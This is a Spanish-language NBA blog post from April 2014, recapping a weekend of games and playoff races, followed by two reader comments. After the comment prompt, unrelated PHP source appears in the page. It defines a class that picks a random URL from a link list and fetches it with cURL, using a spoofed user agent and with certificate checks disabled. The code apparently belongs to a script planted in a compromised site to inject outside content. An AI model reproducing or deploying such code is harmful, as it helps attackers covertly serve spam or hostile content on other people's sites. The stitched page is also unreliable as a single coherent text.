Informe del fin de semana: Los Knicks vuelven a salirse (de la tabla)

07 de April de 2014 por TheDeerHunter

Sensacional jornada de viernes que cumplió las altas expectativas que teníamos. Repasemos…

“Muy apretada la lucha por los últimos puestos de play-off en ambas conferencias, victoria importante de Atlanta sobre Cleveland que prácticamente se quita de la lucha salvo catástrofe de Hawks o de unos Knicks que cayeron anoche contra Wizards con varios fallos de Carmelo que le costaron el partido a Knicks, viendo el calendario de Knicks y Hawks veo a los segundos un poquito por encima.” jhc

Les duró la alegría a los Knicks menos que un caramelo en la puerta de un colegio. Tropezón, esta vez algo más venial, contra un señor equipo este curso y un Bradley Beal tocado por las musas. Los Hawks tenían jornada favorable y lo aprovecharon. Las espadas continuarán en todo lo alto hasta el final.

Los gallos del este ganaron, excepto los dos cocos. Miami sucumbió en un partido épico ante los Wolves, tras dos prórrogas. Sin embargo los Pacers no lo aprovecharon y perdieron su 5º partido de los últimos 6 ante unos Raptors plagados de bajas. Por su parte, los Bobcats tuvieron pocos problemas ante Orlando pero no pudieron acercarse a sus predecesores ya que los Bulls cumplieron ante los Bucks y los Nets siguieron intratables en casa ante Detroit.

“En el Oeste ganaron los 3 (Memphis, Suns y Mavs) que aspiran a las ultimas plazas de PO. La más meritoria de ellas, la victoria de Phoenix en casa de los Blazers, con el saltarín Gerald Green demostrando eso, que no solo es un saltarín tipo Desmond Mason, sino que también es un jugadorazo de baloncesto. 32 puntos, siendo secundado por Bledose y Dragic (32 y 30).”Denise 

Nadie afloja en la conferencia pero el sueño de los Suns sigue vivo. Marc brilló en el complicado compromiso de los Grizzlies ante Denver y Nowitzki no sufrió demasiado para llevarse la victoria del Staples.  Los Warriors le inflingieron la paliza de la noche a los Kings a pesar de jugar sin Bogut ni Lee y en el partidazo de Houston Durant igualó a Jordan e Ibaka hizo uno de sus mejores partidos del año pero los Thunder no lograron doblegar a los Rockets y Harden los trituró a base de tiros libres. No está mal que los de Oklhoma City se lleven de vez en cuando algo de su propia medicina.

Decíamos que el sábado les tocaba a los de “segunda fila” del Este. Los Bobcats, que alcanzan playoffs por segunda vez en toda su historia, ganaron a pesar del increíble partido de Kyrie Irving que se fue hasta los 44 puntos. Sí lograron algo de ventaja gracias a la fácil victoria de Chicago frente a Wizards. Nets y Raptors pasaron fácilmente sus exámemenes ante Sixers y Bucks respectivamente. Por cierto, los Wolves palmaron de la peor manera posible ante Orlando tras haber doblegado el día anterior a los campeones pero en esta ocasión podemos achacarlo a algunas bajas más de la cuenta.

El domingo Durant trituraba el récord de Jordan pero de nuevo con derrota. Dragic y los suyos dejaron en evidencia la defensa de los candidatos. Inmenso resultado pues los Grizzlies no fueron rival para los Spurs y los Mavs ganaron con cierta dosis de suerte a los Raptors. Ahora mismo Phoenix estn 8º con una victoria más que Memphis.

En el Este los Knicks caían ante Miami a pesar de la exhibición triplista de JR Smith (10 de 22 en T3). Doble derrota teniendo en cuenta que los Hawks trituraron a unos Pacers que dieron pena por momentos. Debemos destacar también la remontada de los Rockets ante Nuggets. Warriors y Blazers ganaban sin mayores problemas a Jazz y Pelicans.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Vaya temporadón de los Suns. Hornacek es el CoY de calle. El viernes, en el partido en Portland, Gerald Green me recordó a T-Mac por momentos, con esos triples llegando y esos mates estratosféricos como si nada. Y lo de Dragic es un escándalo: más de 20 puntos de media con más del 50% en FG, más del 40% en triples y 6 asistencias por partido. Ojalá se metan.

      Citar

  2. Nacho dice:
    #2

    MagicJohnson32:
    Vaya temporadón de los Suns. Hornacek es el CoY de calle. El viernes, en el partido en Portland, Gerald Green me recordó a T-Mac por momentos, con esos triples llegando y esos mates estratosféricos como si nada. Y lo de Dragic es un escándalo: más de 20 puntos de media con más del 50% en FG, más del 40% en triples y 6 asistencias por partido. Ojalá se metan.

    Creo que en eso estamos todos. Es que es muy grande lo que están haciendo.

    Txus, te mandé un correo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>